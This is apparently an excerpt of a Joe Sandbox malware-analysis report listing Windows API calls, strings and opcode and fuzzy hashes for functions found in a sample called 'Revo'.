                                                                                                                                                                            • Source File: 00000000.00000002.2776547890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2776511579.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776587140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776849100.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                                                                                            • String ID: PgE
                                                                                                                                                                            • API String ID: 3248276644-3220684765
                                                                                                                                                                            • Opcode ID: b320ac714881839a993191b9b67f373f4f0dd5a8269bf5d6f48fcd2d5b08a690
                                                                                                                                                                            • Instruction ID: 4bebfd15c2bd202af51862231bcf25e973859f7a9abf5f27d8efd0e3f4a0fce5
                                                                                                                                                                            • Opcode Fuzzy Hash: b320ac714881839a993191b9b67f373f4f0dd5a8269bf5d6f48fcd2d5b08a690
                                                                                                                                                                            • Instruction Fuzzy Hash: 21F07835084A6259E622B7360C05AAF25098F8232470B423FFC43B22C1DF3D8973D17E
                                                                                                                                                                            APIs
                                                                                                                                                                            • RegQueryValueExW.KERNEL32(?,00000000,00000000,?,?,00004000,00000000,?,?,?,?,Remove folder: ,?,00000000,004067E1,80000002), ref: 004065B6
                                                                                                                                                                            • RegCloseKey.KERNEL32(?), ref: 004065C1
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2776547890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2776511579.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776587140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776849100.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CloseQueryValue
                                                                                                                                                                            • String ID: Remove folder:
                                                                                                                                                                            • API String ID: 3356406503-1958208860
                                                                                                                                                                            • Opcode ID: 550d5fe316565dec20d5196d1d20fe7c807bd52d6266540c79109f3c5ea7b4a7
                                                                                                                                                                            • Instruction ID: 7e3264d492d8171c025e68cf2784a3a6e2d975f6d7be64ef5dd4a0d5c385ab57
                                                                                                                                                                            • Opcode Fuzzy Hash: 550d5fe316565dec20d5196d1d20fe7c807bd52d6266540c79109f3c5ea7b4a7
                                                                                                                                                                            • Instruction Fuzzy Hash: E1017C72500209BBDF218F55DC09EDB3BA8EF54364F01403AFE16A2190E378DA64DBA4
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 004061DF
                                                                                                                                                                            • GetTempFileNameW.KERNEL32(?,?,00000000,?,?,?,00000000,00403663,004CD000,004D1000,004D1000,004D1000,004D1000,004D1000,004D1000,0040394F), ref: 004061FA
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2776547890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2776511579.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776587140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776849100.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CountFileNameTempTick
                                                                                                                                                                            • String ID: nsa
                                                                                                                                                                            • API String ID: 1716503409-2209301699
                                                                                                                                                                            • Opcode ID: ca4f867381b256d976a036b4ee2479ffffcb38332db50c9e5a73bf50e74bc53e
                                                                                                                                                                            • Instruction ID: f348173cd445ce0cff63ab1922c44f7ab34be52ec2d52f6d3f60174017d9ed76
                                                                                                                                                                            • Opcode Fuzzy Hash: ca4f867381b256d976a036b4ee2479ffffcb38332db50c9e5a73bf50e74bc53e
                                                                                                                                                                            • Instruction Fuzzy Hash: 3BF06D76701204BBEB109B59DD05E9AB7A8EBA1710F11803EEA01A6240E6B099648764
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2776547890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2776511579.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776587140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776849100.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 8001648312b76757b4dc2f3646509216fc345bf83ee85411accbee75f523ad1d
                                                                                                                                                                            • Instruction ID: 24c32228aea39238aae05165091b6f794a4b9b1c66cd55bc1afee76a19a4bada
                                                                                                                                                                            • Opcode Fuzzy Hash: 8001648312b76757b4dc2f3646509216fc345bf83ee85411accbee75f523ad1d
                                                                                                                                                                            • Instruction Fuzzy Hash: 10A14471E04228DBDF28CFA8C8446ADBBB1FF44305F14856ED856BB281C7786A86DF45
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2776547890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2776511579.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776587140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776849100.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 2384488d3f0122d52eec19d06177794e899fdfc3e1a025a719282f78321e7206
                                                                                                                                                                            • Instruction ID: b8cb9ce97df986fef79018f719ec18ee870a51f75f9c549f23c9243a2682c43e
                                                                                                                                                                            • Opcode Fuzzy Hash: 2384488d3f0122d52eec19d06177794e899fdfc3e1a025a719282f78321e7206
                                                                                                                                                                            • Instruction Fuzzy Hash: 48912370D04228CBDF28CF98C8947ADBBB1FF44305F14856AD856BB291C778A986DF45
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2776547890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2776511579.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776587140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776849100.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 27b0d047e0c308e0b5114cd8a4e3873cb63df72f9853a9642e586e78b8cecf79
                                                                                                                                                                            • Instruction ID: 4da454054b0c3dd02772a9c96e50ae6a11cdbe5b18e0bc5540401a1e7d1606fc
                                                                                                                                                                            • Opcode Fuzzy Hash: 27b0d047e0c308e0b5114cd8a4e3873cb63df72f9853a9642e586e78b8cecf79
                                                                                                                                                                            • Instruction Fuzzy Hash: E4813471D04228DBDF24CFA8C8847ADBBB1FF45305F24816AD456BB281C778AA86DF45
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2776547890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2776511579.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776587140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776849100.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 4f111ab4920ac525fdea371edc0372209efebd88f4f49b64d61f26737748280a
                                                                                                                                                                            • Instruction ID: a75c210e76fb72c91da92bd055febaaadf45c37f1dc492509737fdaa257f63d6
                                                                                                                                                                            • Opcode Fuzzy Hash: 4f111ab4920ac525fdea371edc0372209efebd88f4f49b64d61f26737748280a
                                                                                                                                                                            • Instruction Fuzzy Hash: 2D817731D04228DBDF24CFA8C844BADBBB1FF44315F20856AD856BB281C7796A86DF45
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2776547890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2776511579.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776587140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776849100.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: eb6308170f34cf48dfcb4d8f9c09bb4bb9b1200d68288f83770d90fe7aa59a96
                                                                                                                                                                            • Instruction ID: 2ce83fc52b21f36f835e1fdafd5cf74e6ced0850754c4da96a209bb8fab2d9ce
                                                                                                                                                                            • Opcode Fuzzy Hash: eb6308170f34cf48dfcb4d8f9c09bb4bb9b1200d68288f83770d90fe7aa59a96
                                                                                                                                                                            • Instruction Fuzzy Hash: 11712471D04228DBDF28CFA8C8847ADBBB1FF48305F15806AD856B7281C778A986DF55
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2776547890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2776511579.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776587140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776849100.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 35efb6cfb69a5e3ac5770c17f23e35896c35ba4500d931508133f68803cc17e7
                                                                                                                                                                            • Instruction ID: eaca5e257ecba6057ed761995cb39389c4d8ec983a179070fe5d03b82c062b57
                                                                                                                                                                            • Opcode Fuzzy Hash: 35efb6cfb69a5e3ac5770c17f23e35896c35ba4500d931508133f68803cc17e7
                                                                                                                                                                            • Instruction Fuzzy Hash: BF713671E04218DBDF28CFA8C884BADBBB1FF44305F14806AD856BB281C7786986DF55
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2776547890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2776511579.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776587140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776849100.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 3a7222321010e346b35687484556753c48e929d86f13e87db132154ce9d598b8
                                                                                                                                                                            • Instruction ID: 26522df2f7fda751442351ae768cbf4c3b612a3e7fb567ef5040218afec9c9a0
                                                                                                                                                                            • Opcode Fuzzy Hash: 3a7222321010e346b35687484556753c48e929d86f13e87db132154ce9d598b8
                                                                                                                                                                            • Instruction Fuzzy Hash: CB713771D04228DBEF28CF98C8447ADBBB1FF44305F15806AD856B7281C778A946DF45
                                                                                                                                                                            APIs
                                                                                                                                                                            • GlobalFree.KERNEL32(0B240048), ref: 00401C30
                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000040,00004004), ref: 00401C42
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2776547890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2776511579.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776587140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776849100.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Global$AllocFree
                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\PACK.EXE
                                                                                                                                                                            • API String ID: 3394109436-3974614470
                                                                                                                                                                            • Opcode ID: 189f3b68e03b00a9a17d4d6b4d599ebfe199962089991dc822aa892377f91a7d
                                                                                                                                                                            • Instruction ID: 411326a6bd5adc799c7b4966fae4248b5e735fb78bdcb674ef76145c70810545
                                                                                                                                                                            • Opcode Fuzzy Hash: 189f3b68e03b00a9a17d4d6b4d599ebfe199962089991dc822aa892377f91a7d
                                                                                                                                                                            • Instruction Fuzzy Hash: 7D210572A04150ABEB20EFA5DD9599E73A8AF14314714483FFA52F36D0C67C9C908B1D
                                                                                                                                                                            APIs
                                                                                                                                                                            • lstrlenW.KERNEL32(004125F8,00000023,00000011,00000002), ref: 004024FA
                                                                                                                                                                            • RegSetValueExW.KERNEL32(?,?,?,?,004125F8,00000000,00000011,00000002), ref: 0040253A
                                                                                                                                                                            • RegCloseKey.KERNEL32(?,?,?,004125F8,00000000,00000011,00000002), ref: 00402622
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2776547890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2776511579.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776587140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776849100.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CloseValuelstrlen
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2655323295-0
                                                                                                                                                                            • Opcode ID: 939629d39815d1f7589cc98f3e393975f956bfb37faaf682d558e85f3089568e
                                                                                                                                                                            • Instruction ID: 68b8ec3bea957dba5bf8d8436be9304697fc99dec5cd95401ddbf8672b0cd889
                                                                                                                                                                            • Opcode Fuzzy Hash: 939629d39815d1f7589cc98f3e393975f956bfb37faaf682d558e85f3089568e
                                                                                                                                                                            • Instruction Fuzzy Hash: D2118431D00114BEEB10AFA5DE9AEAEB6B4AF44318F21443FF504F71D1D7B98E419628
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 004069FF: FindFirstFileW.KERNEL32(74DF3420,0045A798,00456750,004060C2,00456750,00456750,00000000,00456750,00456750,74DF3420,?,74DF2EE0,00405DCE,?,74DF3420,74DF2EE0), ref: 00406A0A
                                                                                                                                                                              • Part of subcall function 004069FF: FindClose.KERNEL32(00000000), ref: 00406A16
                                                                                                                                                                            • lstrlenW.KERNEL32 ref: 00402364
                                                                                                                                                                            • lstrlenW.KERNEL32(00000000), ref: 0040236F
                                                                                                                                                                            • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 00402398
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2776547890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2776511579.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776587140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776849100.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: FileFindlstrlen$CloseFirstOperation
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1486964399-0
                                                                                                                                                                            • Opcode ID: 9995d0a3bc1ec283eb6257e663bd8360bd446cd403340e99a1a70e618ed02212
                                                                                                                                                                            • Instruction ID: 7cef90a7dc384cf9c97021313212113070c2cd8574a9969a0abcfcfa4bc01db0
                                                                                                                                                                            • Opcode Fuzzy Hash: 9995d0a3bc1ec283eb6257e663bd8360bd446cd403340e99a1a70e618ed02212
                                                                                                                                                                            • Instruction Fuzzy Hash: 34113371914314D6DB10EFF98A4A59EB6BCAF04354F20443FA405F72D1D7B8C5418B59
                                                                                                                                                                            APIs
                                                                                                                                                                            • RegEnumKeyW.ADVAPI32(00000000,00000000,?,00001FFF), ref: 004025F6
                                                                                                                                                                            • RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 00402609
                                                                                                                                                                            • RegCloseKey.KERNEL32(?,?,?,004125F8,00000000,00000011,00000002), ref: 00402622
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2776547890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2776511579.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776587140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776849100.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Enum$CloseValue
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 397863658-0
                                                                                                                                                                            • Opcode ID: ef84c1a1fe8b1ff10c5e784e766aa331886d34ef38f0b3ab15ccb812864dae0e
